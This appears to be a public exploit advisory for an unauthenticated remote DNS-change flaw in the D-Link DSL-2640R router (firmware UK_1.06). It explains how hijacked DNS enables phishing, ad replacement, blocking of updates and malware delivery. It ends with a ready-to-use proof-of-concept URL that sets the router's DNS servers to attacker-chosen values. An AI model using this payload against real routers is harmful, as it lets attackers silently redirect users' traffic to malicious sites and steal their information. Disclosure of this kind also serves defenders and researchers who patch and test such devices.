54 lines
No EOL
1.8 KiB
Text
54 lines
No EOL
1.8 KiB
Text
#
|
|
#
|
|
# D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability
|
|
#
|
|
# Firmware Version: UK_1.06 Hardware Version: B1
|
|
#
|
|
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
|
|
#
|
|
# https://ethical-hacker.org/
|
|
# https://facebook.com/ethicalhackerorg/
|
|
#
|
|
# Description:
|
|
# The vulnerability exist in the web interface.
|
|
# D-Link's various routers are susceptible to unauthorized DNS change.
|
|
# The problem is when entering an invalid / wrong user and password.
|
|
#
|
|
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
|
|
# DEVICES MAY AFFECTED.
|
|
#
|
|
# Once modified, systems use foreign DNS servers, which are
|
|
# usually set up by cybercriminals. Users with vulnerable
|
|
# systems or devices who try to access certain sites are
|
|
# instead redirected to possibly malicious sites.
|
|
#
|
|
# Modifying systems' DNS settings allows cybercriminals to
|
|
# perform malicious activities like:
|
|
#
|
|
# o Steering unknowing users to bad sites:
|
|
# These sites can be phishing pages that
|
|
# spoof well-known sites in order to
|
|
# trick users into handing out sensitive
|
|
# information.
|
|
#
|
|
# o Replacing ads on legitimate sites:
|
|
# Visiting certain sites can serve users
|
|
# with infected systems a different set
|
|
# of ads from those whose systems are
|
|
# not infected.
|
|
#
|
|
# o Controlling and redirecting network traffic:
|
|
# Users of infected systems may not be granted
|
|
# access to download important OS and software
|
|
# updates from vendors like Microsoft and from
|
|
# their respective security vendors.
|
|
#
|
|
# o Pushing additional malware:
|
|
# Infected systems are more prone to other
|
|
# malware infections (e.g., FAKEAV infection).
|
|
#
|
|
#
|
|
|
|
Proof of Concept:
|
|
|
|
http://<TARGET>/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=<MALICIOUS DNS>&dnsSecondary=<MALICIOUS DNS> |